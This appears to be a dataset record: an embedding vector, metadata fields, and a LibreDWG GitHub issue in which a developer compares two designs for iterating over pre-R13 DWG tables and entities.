-0.004321446176618338, 0.005291363224387169, 0.0066166953183710575, 0.01007783878594637, -0.005726497620344162, 0.00047084165271371603, -0.014017296954989433, 0.0266262199729681, 0.025284279137849808, -0.0014698231825605035, 0.009207569994032383, -0.01199774257838726, 0.015159938484430313, 0.016023563221096992, 0.0018850273918360472, 0.019557783380150795, -0.022587113082408905, 0.00793206226080656, -0.019796939566731453, -0.03305690363049507, -0.010363498702645302, -0.017578087747097015, -0.012808221392333508, -0.03406668081879616, 0.003969353158026934, -0.003064207499846816, -0.00542755052447319, -0.000954969844315201, 0.014150162227451801, -0.009240786544978619, 0.004005890805274248, -0.003663762705400586, 0.0034843944013118744, 0.004909375216811895, -0.0003751370823010802, 0.003221985185518861, -0.026732511818408966, -0.0033880670089274645, 0.01351240836083889, -0.004284908063709736, -0.0022105476818978786, 0.0060653043910861015, -0.009347078390419483, 0.016568312421441078, -0.04304838180541992, -0.0053910124115645885, -0.012562421150505543, -0.00774605106562376, -0.015359236858785152, 0.005201679188758135, -0.006247994024306536, 0.00935372244566679, -0.0053013283759355545, 0.010164201259613037, -0.00272540096193552, -0.013399472460150719, -0.010230633430182934, 0.004264978226274252, 0.005002381280064583, -0.014123588800430298, -0.013778138905763626, -0.022826271131634712, 0.011419778689742088, -0.007925419136881828, -0.02637377567589283, 0.0013710045022889972, 0.011911380104720592, 0.0032170028425753117, -0.011778514832258224, -0.01628929376602173, -0.005334544461220503, -0.005822824779897928, 0.025802455842494965, 0.005895901005715132, -0.019331911578774452, 0.011140760965645313, -0.009765604510903358, 0.0002181898453272879, -0.01787039265036583, -0.013671847060322762, 0.00011418118083383888, -0.024792678654193878, -0.01021734718233347, 0.023397590965032578, 0.0037268735468387604, 0.00003337204543640837, 0.006536976434290409, 0.0347575806081295, 0.0073341685347259045, 0.035235896706581116, 0.00048620422603562474, 0.010715591721236706, -0.017325643450021744, 0.01651516556739807, 0.006653233431279659, -0.0016840685857459903, 0.0026423600502312183, 0.000021227318939054385, 0.0343855582177639, -0.006181561388075352, 0.010197416879236698, 0.0012588993413373828, -0.005374404136091471, 0.01007783878594637, 0.01248934492468834, -0.003310008440166712, 0.006686449982225895, -0.0042716218158602715, -0.010257206857204437, 0.01651516556739807, 0.009320505894720554, -0.024526948109269142, -0.009998119436204433, -0.0073142386972904205, 0.007407244294881821, -0.015757832676172256, 0.0033299382776021957, -0.008981699123978615, 0.0018584543140605092, -0.006297818385064602, -0.01167222298681736, -0.008855476975440979, 0.018282275646924973, -0.0006190695567056537, -0.012449485249817371, -0.00416532950475812, -0.012263474054634571, 0.011419778689742088, -0.01133341621607542, 0.006855852901935577, -0.004866193979978561, -0.022029077634215355, -0.03701629117131233, 0.010682376101613045, 0.005640135146677494, 0.0011210516095161438, 0.0026672722306102514, 0.010197416879236698, -0.011818374507129192, -0.003007739782333374, 0.010270493105053902, 0.00024351730826310813, -0.006732952781021595, 0.015438956208527088, 0.022215090692043304, 0.004842942580580711, -0.0007963618263602257, 0.009360365569591522, 0.012542490847408772, -0.008696038275957108, 0.03427926450967789, -0.01269528642296791, 0.010622586123645306, -0.011273626238107681, -0.01691376231610775, 0.01539909653365612, 0.01335961278527975, -0.005331222899258137, 0.01595713011920452, 0.003074172418564558, -0.0240220595151186, 0.0007041864446364343, -0.01898646168410778, -0.012356479652225971, -0.018096262589097023, -0.0062612807378172874, 0.012050889432430267, 0.020208822563290596, -0.012549133971333504, 0.02062070555984974, 0.026586361229419708, -0.000026391422579763457, 0.0065735140815377235, 0.009127850644290447, -0.023663323372602463, -0.022733265534043312, 0.008025068789720535, 0.014721482992172241, -0.0014366068644449115, 0.011818374507129192, 0.02693181112408638, -0.01199774257838726, -0.0067495605908334255, -0.014097015373408794, 0.011559287086129189, -0.018720731139183044, 0.027370266616344452, -0.00016795012925285846, -0.009745675139129162, -0.014694909565150738, -0.0014191681984812021, -0.00924742966890335, 0.017710953950881958, 0.0026971669867634773, 0.0052780769765377045, 0.0162627212703228, 0.007912132889032364, -0.007354098372161388, 0.015372523106634617, -0.02646678127348423, 0.002896465128287673, 0.001377647859044373, -0.014429179020226002, 0.003055903594940901, -0.013147028163075447, -0.029549257829785347, -0.01700676791369915, -0.00033299383358098567, -0.02194935828447342, 0.0242080707103014, 0.006473865360021591, 0.020740283653140068, -0.007035221438854933, 0.0066166953183710575, -0.028273750096559525, -0.004195224028080702, -0.02171020209789276, 0.016687890514731407, 0.006928929127752781, -0.0041420781053602695, -0.016900474205613136, 0.03388066962361336, -0.002019553678110242, -0.01494735386222601, 0.005866006016731262, 0.0034312482457607985, -0.03473100811243057, -0.0035508270375430584, 0.014774628914892673, 0.0025842315517365932, -0.03579393029212952, 0.02157733589410782, 0.006208134349435568, -0.016834042966365814, 0.007108297199010849, 0.01975708082318306, -0.019770367071032524, -0.003710265504196286, -0.028061166405677795, -0.008822260424494743, -0.017710953950881958, -0.0024679743219166994, -0.003906241850927472, 0.021564049646258354, 0.031090496107935905, 0.015239657834172249, -0.007633115630596876, -0.010383429005742073, -0.0007855665171518922, -0.018906742334365845, 0.0023566994350403547, -0.0002734120062086731, -0.012449485249817371, -0.01982351392507553, -0.023384304717183113, 0.011207194067537785, 0.003740160260349512, 0.033189769834280014, 0.007865630090236664, 0.0006859174463897943, -0.01437603309750557, -0.01895988918840885, -0.021696915850043297, -0.019119326025247574, -0.023264726623892784, 0.02050112746655941, -0.0035076458007097244, 0.010961392894387245, 0.015518675558269024, -0.007088367361575365, -0.006228064186871052, -0.013492478057742119, -0.009745675139129162, -0.0000020565587419696385, -0.00944672804325819, 0.006633303593844175, -0.014495612122118473, 0.0025892138946801424, 0.0007851513219065964, 0.015651540830731392, 0.005630169995129108, -0.0016765948385000229, -0.012276760302484035, 0.0007465372909791768, -0.016581598669290543, 0.002100933576002717, -0.01559839490801096, 0.008603032678365707, -0.004783153533935547, 0.007672975305467844, 0.01171872578561306, 0.0001436606835341081, 0.010443218052387238, -0.005141889676451683, 0.007573326118290424, -0.011831661686301231, 0.015279517509043217, 0.0033149910159409046, -0.00540429912507534, 0.010536223649978638, -0.00930721964687109, -0.015186511911451817, -0.008390448056161404, -0.00853660050779581, 0.007865630090236664, -0.011413135565817356, 0.0006531163235194981, 0.020820003002882004, -0.01380471233278513, -0.0055006262846291065, 0.0012921157758682966, 0.008689395152032375, 0.021258458495140076, 0.009048131294548512, -0.012183754704892635, -0.013299823738634586, -0.0024746174458414316, 0.04001905024051666, -0.005912508815526962, -0.013724992983043194, -0.006928929127752781, 0.010755451396107674, 0.009958259761333466, 0.0007780928281135857, -0.027503130957484245, -0.0034412131644785404, -0.02213537134230137, 0.018813736736774445, 0.019770367071032524, -0.019132614135742188, 0.0261611919850111, 0.0065701925195753574, 0.001968068303540349, 0.0006099350866861641, -0.0018235772149637341, 0.022055651992559433, 0.0022454247809946537, 0.012482701800763607, -0.008104787208139896, 0.003026008838787675, 0.0003452423552516848, -0.008636249229311943, -0.009367008693516254, -0.015332663431763649, -0.00896841287612915, 0.012329906225204468, 0.0015869108028709888, -0.0025061729829758406, -0.007433817256242037, 0.006792742293328047, -0.001054618856869638, 0.027077961713075638, -0.004245048388838768, -0.006792742293328047, -0.01842842623591423, -0.024008773267269135, -0.0033066868782043457, 0.0024314362090080976, -0.009685885161161423, 0.010602656751871109, -0.012402982451021671, 0.0017903608968481421, -0.01814940944314003, 0.029974427074193954, -0.00022628632723353803, 0.000921753526199609, 0.004906053654849529, -0.018880169838666916, -0.00638418085873127, 0.018361994996666908, 0.008078214712440968, -0.04387214407324791, 0.009506517089903355, -0.00540429912507534, -0.01444246619939804, -0.005042240954935551, 0.006732952781021595, -0.0010703966254368424, 0.022068938240408897, -0.013618700206279755, 0.023676609620451927, -0.00915442407131195, -0.01417673472315073, -0.0082708690315485, 0.007593255955725908, -0.00640743225812912, 0.01269528642296791, 0.03539533540606499, -0.011546000838279724, 0.0012680338695645332, -0.01501378696411848, -0.009413511492311954, 0.010277136228978634, 0.0036704058293253183, 0.01861443929374218, 0.039407867938280106, -0.02285284362733364, -0.02709124982357025, 0.00032884179381653666, 0.007134870160371065, 0.015824265778064728, 0.021032588556408882, 0.008138003759086132, -0.001865097670815885, 0.011825017631053925, -0.01880045048892498, 0.0016940335044637322, 0.006513724569231272, -0.008257582783699036, 0.008071571588516235, -0.002283623442053795, 0.029150662943720818, 0.0079453494399786, 0.006055339239537716, 0.005510591436177492, 0.017644520848989487, -0.017631234601140022, -0.013293180614709854, 0.005337866488844156, -0.0008802330703474581, 0.0018069690559059381, -0.004882802255451679, -0.010363498702645302, -0.008543243631720543, -0.001047975616529584, 0.03263173624873161, 0.004999059718102217, -0.003952744882553816, -0.002956254407763481, 0.0013660220429301262, 0.015053646638989449, -0.000374721857951954, -0.009068061597645283, 0.031143642961978912, -0.020288541913032532, 0.0008835546905174851, -0.010556153953075409, 0.0006128415116108954, -0.03249887004494667, 0.012595636770129204, -0.008191149681806564, 0.026453495025634766, 0.007294308859854937, -0.013379543088376522, 0.014774628914892673, -0.022361241281032562, 0.02248082123696804, 0.002913073170930147, 0.008669465780258179, -0.01666131801903248, -0.001415846636518836, 0.022281521931290627, 0.006427362095564604, -0.003760090097784996, 0.021869640797376633, 0.020820003002882004, -0.010968036018311977, -0.004055715631693602, -0.001931530307047069, 0.04403158277273178, -0.02003609761595726, -0.031090496107935905, -0.01097467914223671, -0.0005169293144717813, -0.030665326863527298, 0.005284720100462437, -0.004457633011043072, 0.002966219326481223, -0.00874918419867754, -0.0009956598514690995, -0.014482324942946434, 0.0034312482457607985, -0.01437603309750557, 0.00609852047637105, -0.007081724237650633, 0.0008395430631935596, 0.017299070954322815, 0.015412382781505585, -0.021417897194623947, -0.015970418229699135, -0.013273250311613083, -0.0014067121082916856, -0.0042749433778226376, 0.0008619640721008182, -0.011067685671150684, -0.0036405110731720924, 0.0022354598622769117, -0.004929305054247379, 0.0009126189979724586, -0.022361241281032562, -0.012077461928129196, -0.02019553631544113, 0.01759137585759163, -0.0025211204774677753, -0.0034079968463629484, 0.00915442407131195, 0.0055438075214624405, -0.01854800619184971, 0.011167334392666817, -0.008171220310032368, -0.010197416879236698, 0.008138003759086132, -0.00191326136700809, -0.03861067816615105, -0.002026196802034974, 0.005487339571118355, 0.020275255665183067, 0.00384977413341403, 0.009951616637408733, -0.017764100804924965, -0.01380471233278513, -0.003266827203333378, -0.013166958466172218, -0.008569816127419472, -0.001944816904142499, 0.025961892679333687, -0.02539057284593582, -0.013412758708000183, -0.004700112622231245, -0.0009043149184435606, 0.0027752253226935863, 0.0035408621188253164, -0.010728878900408745, 0.005799573380500078, -0.005776321981102228, 0.031249934807419777, 0.008935196325182915, -0.012177111580967903, 0.021603908389806747, 0.013007519766688347, -0.01399072352796793, -0.00837716180831194, -0.002162383869290352, -0.008596389554440975, 0.012130608782172203, 0.004364627413451672, 0.015252944082021713, -0.013857858255505562, -0.0036471544299274683, -0.003863060614094138, 0.012276760302484035, -0.008350588381290436, 0.0023683251347392797, 0.0008295781444758177, 0.017445223405957222, -0.02136475220322609, -0.0011343380901962519, -0.00274865236133337, 0.012622210197150707, 0.009705815464258194, 0.0011949578765779734, -0.02705138921737671, -0.016581598669290543, -0.0034412131644785404, 0.009367008693516254, -0.020660564303398132, -0.002144114812836051, -0.0243010763078928, -0.009194283746182919, 0.01380471233278513, -0.01682075671851635, -0.002898125909268856, -0.028459763154387474, 0.0016251095803454518, -0.006367573048919439, -0.011180620640516281, -0.030585607513785362, -0.030080720782279968, -0.01798997074365616, -0.018508145585656166, 0.010908246971666813, 0.005679994355887175, -0.009964902885258198, -0.011386562138795853, -0.010708948597311974, 0.0008561512222513556, 0.023012282326817513, -0.013352969661355019, -0.02285284362733364, -0.015784405171871185, -0.011751942336559296, 0.002064395695924759, 0.02167034149169922, -0.012316619977355003, -0.019491350278258324, -0.0026257517747581005, 0.0034943593200296164, 0.002165705431252718, 0.023796187713742256, -0.006982075050473213, 0.005135246552526951, 0.015146652236580849, 0.0018102906178683043, -0.0024065240286290646, -0.009466657415032387, 0.019650788977742195, -0.01725921221077442, 0.007320881821215153, 0.015239657834172249, 0.018003256991505623, -0.0032684882171452045, 0.010715591721236706, 0.0046469662338495255, 0.003856417490169406, 0.0025676232762634754, -0.013426045887172222, -0.000013091909750073683, -0.0052581471391022205, -0.00559695390984416, 0.0062413509003818035, -0.007168086711317301, -0.025682875886559486, 0.012615567073225975, 0.005121959839016199, -0.016594884917140007, -0.015664827078580856, -0.02248082123696804, 0.004434381611645222, -0.010429931804537773, -0.006962145213037729, -0.023796187713742256, 0.004454311449080706, -0.0033133302349597216, 0.010582726448774338, 0.010775381699204445, 0.005261468701064587, -0.011725368909537792, -0.002876535290852189, -0.009998119436204433, 0.02124517224729061, 0.005025632679462433, 0.013964150100946426, -0.0050821006298065186, -0.009984832257032394, -0.00599887128919363, 0.002195600187405944, -0.00311071053147316, -0.009021558798849583, 0.0013178583467379212, 0.015531961806118488, 0.005141889676451683, -0.03871696814894676, 0.005009024403989315, -0.008928553201258183, -0.000021058642232674174, -0.0036936572287231684, 0.004321446176618338, -0.01074216514825821, -0.0047798315063118935, -0.0015462207375094295, 0.00992504321038723, -0.0062413509003818035, -0.009034845046699047, 0.007141513749957085, 0.013366255909204483, 0.015903985127806664, -0.0026539857499301434, 0.008523313328623772, -0.02096615545451641, -0.018096262589097023, -0.012157181277871132, -0.006935572251677513, -0.0015163260977715254, -0.01969064772129059, 0.006234707310795784, 0.013200175017118454, 0.0023832726292312145, -0.013817998580634594, -0.015558535233139992, 0.03005414642393589, 0.0015246301190927625, 0.015810979530215263, 0.005706567782908678, 0.01651516556739807, -0.0036936572287231684, 0.020301828160881996, 0.0013635308714583516, -0.0009890166111290455, 0.0027004885487258434, 0.008456881158053875, -0.0013502442743629217, -0.01135998871177435, -0.004846264608204365, 0.01870744489133358, 0.017418650910258293, 0.005557094234973192, 0.023198293522000313, 0.013572197407484055, 0.01446903869509697, -0.006875782739371061, 0.013572197407484055, 0.021723488345742226, 0.012263474054634571, 0.005198357626795769, 0.011386562138795853, -0.015505388379096985, -0.0024231323041021824, 0.0020810039713978767, -0.017245925962924957, -0.006580157671123743, -0.001606840523891151, -0.01682075671851635, 0.0007614846690557897, 0.012130608782172203, 0.0010795311536639929, 0.020235395058989525, -0.015810979530215263, -0.015478815883398056, 0.014681623317301273, 0.02250739373266697, -0.03435898572206497, 0.005626848433166742, 0.006178239826112986, -0.013817998580634594, 0.005862684454768896, -0.0032170028425753117, -0.0023483955301344395, -0.019185759127140045, -0.008244296535849571, 0.005307971499860287, -0.00009845531894825399, 0.006590122357010841, 0.00769954826682806, 0.006835923530161381, -0.009592879563570023, 0.0035840433556586504, 0.022520679980516434, -0.00014241506869439036, 0.0033332600723952055, 0.00150553067214787, 0.009207569994032383, -0.0078988466411829, 0.008284156210720539, -0.012808221392333508, -0.017551515251398087, -0.016807468608021736, -0.0033017045352607965, -0.0014332851860672235, 0.0025792489759624004, 0.013133741915225983, -0.01058936957269907, 0.012980946339666843, 0.0015229693381115794, 0.004367948975414038, 0.0033947101328521967, -0.017923537641763687, 0.013924290426075459, 0.001417507417500019, -0.005078778602182865, 0.01595713011920452, -0.023889193311333656, -0.002994453301653266, -0.01721935160458088, -0.0082708690315485, -0.0011899754172191024, 0.007872273214161396, -0.007048507686704397, 0.018694156780838966, 0.005686637945473194, 0.03784005716443062, -0.003879668889567256, -0.010104411281645298, 0.008901979774236679, -0.0028167457785457373, -0.01845500059425831, -0.020235395058989525, -0.006271245423704386, 0.01910603977739811, -0.006629982031881809, -0.0007938705966807902, -0.003916206769645214, 0.010164201259613037, -0.007387314457446337, -0.021099021658301353, -0.001042993157170713, 0.002833354054018855, 0.0010504667880013585, -0.00294130714610219, -0.010237276554107666, -0.004935948643833399, 0.003843130776658654, -0.015837552025914192, -0.0178438201546669, 0.007433817256242037, 0.015080219134688377, 0.001896653207950294, 0.013618700206279755, -0.046954620629549026, -0.027503130957484245, -0.021869640797376633, -0.023915765807032585, 0.009187640622258186, 0.008290799334645271, 0.00614502327516675, 0.00865617860108614, 0.004178615752607584, 0.0033947101328521967, 0.006663198117166758, -0.0011700456961989403, 0.0074471039697527885, -0.013631987385451794, 0.021404610946774483, -0.011413135565817356, -0.0025543367955833673, 0.010735522024333477, 0.0179368257522583, 0.034119825810194016, 0.024792678654193878, 0.0026622898876667023, -0.012183754704892635, -0.008729254826903343, -0.0016956942854449153, 0.002766921417787671, -0.01917247287929058, -0.012914514169096947, -0.019252192229032516, -0.007194659672677517, -0.00384977413341403, 0.0016608171863481402, 0.0032468975987285376, 0.013844572007656097, 0.010429931804537773, 0.00549730472266674, 0.01973050832748413, 0.0022670153994113207, -0.004092253278940916, 0.03061218187212944, 0.009765604510903358, -0.01326660718768835, 0.004819691181182861, -0.009619452990591526, -0.0032170028425753117, -0.010057908482849598, -0.028778638690710068, 0.004301516339182854, -0.015624967403709888, -0.009825394488871098, 0.029602404683828354, 0.014841062016785145, -0.0035308972001075745, -0.0011160691501572728, -0.000029894708859501407, 0.019411630928516388, -0.03975331783294678, 0.00382652273401618, 0.000057920999097405, 0.018601151183247566, 0.015558535233139992, -0.016528451815247536, -0.00207934295758605, -0.016408873721957207, -0.004909375216811895, -0.0018634367734193802, -0.009752318263053894, -0.003906241850927472, -0.021218599751591682, -0.007998495362699032, 0.038637250661849976, 0.013631987385451794, 0.017086487263441086, 0.013545624911785126, 0.00595901207998395, 0.0025244420394301414, -0.006849209778010845, -0.011526070535182953, -0.007061794400215149, 0.02368989586830139, 0.0003390143101569265, 0.013200175017118454, 0.00837716180831194, -0.00396603113040328, 0.0008146308246068656, 0.0005310463020578027, -0.008450237102806568, 0.021351465955376625, -0.0013070630375295877, -0.010689019225537777, 0.009705815464258194, 0.007772624026983976, -0.01510679256170988, -0.011479567736387253, -0.03499673679471016, -0.006776134017854929, 0.013924290426075459, 0.007805840577930212, -0.019650788977742195, -0.00655358424410224, -0.024194784462451935, 0.006689771544188261, -0.03321634232997894, -0.005527199245989323, -0.005397655535489321, -0.011140760965645313, 0.027529705315828323, 0.00396603113040328, -0.0017123024445027113, -0.011107545346021652, 0.004424416925758123, 0.021218599751591682, -0.0021789921447634697, 0.005862684454768896, 0.010316995903849602, -0.006294496823102236, 0.020089244470000267, 0.005364439450204372, -0.008138003759086132, 0.015810979530215263, -0.011041112244129181, 0.029230382293462753, -0.004308159463107586, -0.0012580689508467913, 0.009646025486290455, -0.0022254949435591698, -0.009798821061849594, 0.013233390636742115, -0.019438203424215317, -0.0000340727019647602, 0.007951992563903332, 0.007560039404779673, -0.00538104772567749, 0.009028201922774315, 0.0004608767630998045, 0.002768582198768854, 0.009367008693516254, -0.01308059599250555, -0.0080848578363657, 0.021417897194623947, -0.0016848989762365818, -0.021564049646258354, -0.013406115584075451, 0.016993481665849686, -0.005195036064833403, -0.0014947353629395366, 0.0026573073118925095, 0.01789696514606476, -0.00048620422603562474, -0.012901227921247482, -0.023331159725785255, 0.022533966228365898, -0.0079453494399786, 0.02105916105210781, -0.005802894942462444, -0.028459763154387474, 0.0021673664450645447, 0.010489720851182938, -0.0034910375252366066, -0.007493606768548489, -0.03162195906043053, -0.03858410194516182, -0.01756480149924755, -0.0006468882784247398, 0.008104787208139896, 0.004527387674897909, -0.012090749107301235, 0.004005890805274248, -0.0022537289187312126, -0.02965555153787136, -0.014548758044838905, 0.02814088575541973, 0.011552643962204456, 0.018508145585656166, -0.016249435022473335, 0.02050112746655941, -0.014960641041398048, 0.003985960967838764, -0.02278641052544117, 0.005460766609758139, 0.015518675558269024, 0.014256454072892666, -0.010197416879236698, 0.010715591721236706, -0.004394521936774254, 0.025829028338193893, -0.008709325455129147, -0.014163448475301266, -0.002874874509871006, 0.00413543451577425, 0.017431937158107758, 0.002808441873639822, 0.003202055348083377, -0.008211079984903336, 0.014455752447247505, -0.01632915437221527, -0.007340811658650637, 0.022985709831118584, -0.004985773004591465, 0.011851591058075428, -0.0009740692330524325, -0.0007419700268656015, 0.01700676791369915, -0.030001001432538033, -0.005613561719655991, -0.0013759869616478682, 0.002723740180954337, 0.019039606675505638, -0.02062070555984974, -0.016887187957763672, 0.000028233891498530284, 0.0045373523607850075, -0.00022504072694573551, -0.01040335837751627, 0.006583479233086109, -0.002283623442053795, 0.0005244030035100877, 0.013778138905763626, -0.018016545102000237, -0.005547129083424807, -0.0006149175460450351, -0.004809726495295763, -0.0061084856279194355, 0.021205313503742218, -0.01638229936361313, -0.023703182116150856, 0.004676861222833395, -0.005261468701064587, -0.004690147470682859, -0.004082288593053818, 0.014296313747763634, 0.03045274317264557, 0.005663386546075344, 0.012967660091817379, -0.0009815429802984, 0.018694156780838966, -0.0006169935804791749, 0.001442419714294374, 0.008304085582494736, -0.01011105440557003, -0.006862496491521597, -0.009280646219849586, -0.0057198540307581425, -0.024327648803591728, -0.016342440620064735, -0.004557282198220491, -0.006975431926548481, -0.0021241852082312107, -0.006855852901935577, 0.0014532150235027075, 0.017299070954322815, -0.007101654075086117, 0.01379142515361309, -0.009287289343774319, 0.019557783380150795, -0.01399072352796793, -0.004879480693489313, -0.019026320427656174, 0.03361493721604347, 0.018136123195290565, 0.0122435437515378, 0.00599887128919363, -0.01765780709683895, 0.011160691268742085, -0.004872837569564581, -0.012137251906096935, -0.01335961278527975, 0.006928929127752781, -0.0020378227345645428, 0.01814940944314003, 0.003135622711852193, -0.0077327643521130085, -0.007905489765107632, 0.00915442407131195, 0.010243919678032398, -0.012555777095258236, -0.002873213728889823, -0.00036766339326277375, -0.003836487652733922, -0.003975996281951666, -0.0067694904282689095, 0.0034378913696855307, 0.0120110297575593, 0.0023533778730779886, -0.013977437280118465, -0.008941839449107647, -0.0022421032190322876, 0.03026673197746277, -0.004550639074295759, 0.00614502327516675, -0.040922533720731735, 0.0032385934609919786, 0.03255201503634453, -0.013452618382871151, 0.011805088259279728, 0.02040812000632286, 0.03497016429901123, 0.0063310349360108376, -0.0009092973778024316, 0.006251315586268902, 0.008370518684387207, 0.009964902885258198, 0.011466281488537788, 0.00851667020469904, 0.018043117597699165, 0.030904484912753105, -0.018189270049333572, 0.0005397655768319964, -0.014801202341914177, -0.004753258544951677, 0.005919152405112982, 0.003876347094774246, -0.024327648803591728, -0.03709601238369942, 0.004108861554414034, 0.0042051891796290874, -0.007706191390752792, 0.005025632679462433, -0.011007895693182945, 0.0065735140815377235, -0.044695910066366196, -0.013572197407484055, -0.015266231261193752, -0.024712959304451942, -0.008410378359258175, 0.008211079984903336, 0.008975056000053883, -0.031489092856645584, 0.0046270363964140415, -0.011738655157387257, 0.008357231505215168, 0.004607106558978558, 0.01012434158474207, 0.0033216343726962805, -0.017551515251398087, -0.023570315912365913, -0.0005169293144717813, 0.004132112953811884, 0.010130984708666801, 0.0008877067593857646, -0.0020594133529812098, -0.022175230085849762, 0.0267192255705595, 0.013950863853096962, 0.014907494187355042, 0.00856317300349474, -0.003677049186080694, 0.026918524876236916, 0.01114740502089262, -0.005493983160704374, 0.00013608321023639292, -0.01558510772883892, 0.0007635607034899294, 0.0026041611563414335, 0.011539357714354992, 0.004813048057258129, 0.029017796739935875, 0.017352217808365822, -0.005138568114489317, -0.014681623317301273, 0.003956066444516182, -0.019610928371548653, -0.010615942999720573, 0.004673539195209742, -0.002778547117486596, 0.008277512155473232, 0.013778138905763626, 0.012495988048613071, 0.0023301264736801386, -0.011419778689742088, 0.012250186875462532, -0.0036903356667608023, -0.0009043149184435606, -0.016528451815247536, -0.013937577605247498, -0.0319674089550972, 0.00967924203723669, -0.0024696351028978825, 0.0074006011709570885, -0.03236600384116173, 0.00588261429220438, 0.02031511440873146, 0.0037700547836720943, -0.02968212403357029, 0.00858310330659151, 0.006802706979215145, 0.00597561988979578, 0.012509274296462536, -0.012316619977355003, 0.023756328970193863, 0.010941463522613049, -0.006118450313806534, -0.00425833510234952, 0.01446903869509697, 0.004570568911731243, 0.019066181033849716, -0.014907494187355042, -0.014123588800430298, -0.02721082791686058, -0.030904484912753105, 0.017950112000107765, 0.013399472460150719, -0.029735269024968147, 0.006503759883344173, -0.014322887174785137, -0.00626792386174202, 0.01796339824795723, 0.03691000118851662, 0.021072447299957275, -0.004500814247876406, 0.021258458495140076, 0.01015755720436573, -0.005560415796935558, 0.0067263091914355755, 0.004102218430489302, 0.020846577361226082, -0.0031954122241586447, -0.02355702966451645, 0.011771871708333492, -0.00030496754334308207, -0.019531209021806717, 0.04440360516309738, -0.003863060614094138, 0.011705439537763596, -0.014057156629860401, -0.010044622235000134, -0.02040812000632286, 0.0074670338071882725, -0.016927048563957214, -0.01437603309750557, 0.0007440460612997413, -0.001979694003239274, -0.005852719768881798, 0.007148156873881817, 0.01133341621607542, -0.002117541851475835, -0.0078988466411829, -0.009194283746182919, 0.01417673472315073, -0.011439708061516285, -0.006493795197457075, 0.000913449446670711, -0.036591123789548874, -0.006829279940575361, 0.007759337779134512, -0.01408372912555933, 0.004115504678338766, -0.01898646168410778, -0.00022753194207325578, 0.01094810664653778, -0.03908899053931236, 0.028698919340968132, -0.005796251818537712, 0.005799573380500078, -0.017418650910258293, 0.008729254826903343, 0.01012434158474207, 0.0267192255705595, 0.016873901709914207, 0.0051684631034731865, -0.002195600187405944, -0.01419002190232277, 0.014057156629860401, -0.0005501456907950342, -0.02612133137881756, -0.002077682176604867, -0.012276760302484035, 0.012416268698871136, -0.00040150253335013986, -0.0017920216778293252, -0.013067308813333511, 0.0014565365854650736, 0.011187263764441013, 0.013279893435537815, 0.005912508815526962, 0.019464775919914246, 0.0011974491644650698, 0.0011982795549556613, -0.028220605105161667, 0.0036903356667608023, -0.01808297634124756, -0.02891150489449501, -0.015425669960677624, 0.008350588381290436, -0.002776886336505413, -0.005995549727231264, 0.01854800619184971, 0.032259710133075714, 0.001039671478793025, 0.0072677358984947205, 0.026666080579161644, 0.01586412452161312, 0.011021182872354984, 0.00032095290953293443, -0.0015927236527204514, 0.01796339824795723, -0.00760654266923666, 0.024540234357118607, 0.022826271131634712, 0.01369841955602169, -0.008450237102806568, 0.028805213049054146, -0.018348706886172295, 0.020607419312000275, -0.001059601316228509, -0.002140793250873685, -0.004480884410440922, 0.00575971370562911, -0.0009707476128824055, -0.00842366460710764, 0.00024580094031989574, 0.013844572007656097, -0.005002381280064583, -0.0001779150334186852, -0.032950613647699356, 0.027822008356451988, -0.009805464185774326, -0.00020635653345379978, -0.000013234636753622908, 0.01494735386222601, 0.0014357763575389981, -0.026081472635269165, 0.03608623519539833, -0.023118574172258377, 0.01331310998648405, 0.0035441836807876825, -0.014721482992172241, -0.024965403601527214, 0.006135058589279652, -0.011499498039484024, -0.00373019534163177, 0.0023849334102123976, -0.00575971370562911, -0.006676484830677509, 0.005510591436177492, 0.00270214956253767, -0.014110302552580833, -0.005683316383510828, -0.023663323372602463, -0.005032275803387165, 0.014615191146731377, 0.00296455854550004, -0.0034478562884032726, 0.005869327578693628, -0.006038730964064598, 0.03082476556301117, -0.0022454247809946537, 0.016834042966365814, 0.001019741757772863, -0.007214589510113001, 0.022454246878623962, -0.0033216343726962805, 0.002841658191755414, -0.01419002190232277, 0.03869039565324783, 0.00765304546803236, 0.035847075283527374, 0.022215090692043304, 0.012363122776150703, -0.010782024823129177, 0.012163824401795864, -0.014070442877709866, 0.032047126442193985, -0.00021279219072312117, 0.0009458353742957115, -0.016249435022473335, 0.00983203761279583, -0.009433440864086151, 0.004460955038666725, -0.0032518799416720867, 0.0037036221474409103, 0.01700676791369915, -0.01088167354464531, 0.017272498458623886, -0.0074471039697527885, 0.0034810726065188646, 0.023889193311333656, -0.00028213131008669734, 0.05761042609810829, 0.016036849468946457, 0.009234143421053886, -0.011340059340000153, 0.0007764319889247417, 0.011798445135354996, 0.0123365493491292, 0.021696915850043297, 0.0004932626616209745, 0.020328402519226074, 0.009838680736720562, 0.01747179590165615, 0.0006398297846317291, -0.017950112000107765, 0.0056334915570914745, 0.006477186921983957, -0.020886436104774475, 0.015332663431763649, 0.01408372912555933, 0.0077327643521130085, 0.013598770834505558, 0.006782777141779661, -0.0028931433334946632, -0.002957915421575308, 0.00024102609313558787, -0.03653797507286072, -0.009612809866666794, 0.031063923612236977, -0.020115816965699196, 0.001904957229271531, -0.010223990306258202, 0.012163824401795864, -0.00296455854550004, 0.006344321649521589, 0.004869516007602215, 0.016648031771183014, -0.013379543088376522, -0.008782400749623775, 0.01521308533847332, 0.012017672881484032, 0.019624214619398117, 0.006789420265704393, -0.008410378359258175, 0.012343192473053932, -0.00580621650442481, 0.011645649559795856, 0.01419002190232277 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Two variants: 1. json dump the tables, entities and blocks, as in the dwg/dxf. very simple and understandable, but needs special code for injson. 2. or create interim _CONTROL objects, holding the tables. best as r2004 arrays, not as r2000 doubly-linked lists. this would allow the old iteration via model_space -> block_control -> entities, as before. e.g. for dxf in/out, and all the helpers. we really need to add some diagrams to the docs also, how the iterators work.
pick a preR13 iterator/tables variant
https://api.github.com/repos/LibreDWG/libredwg/issues/453/comments
1
2022-04-27T07:01:24
2022-05-06T13:22:48Z
https://github.com/LibreDWG/libredwg/issues/453
1,216,891,010
453
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : pick a preR13 iterator/tables variant Issue date: --- start body --- Two variants: 1. json dump the tables, entities and blocks, as in the dwg/dxf. very simple and understandable, but needs special code for injson. 2. or create interim _CONTROL objects, holding the tables. best as r2004 arrays, not as r2000 doubly-linked lists. this would allow the old iteration via model_space -> block_control -> entities, as before. e.g. for dxf in/out, and all the helpers. we really need to add some diagrams to the docs also, how the iterators work. --- end body ---
653
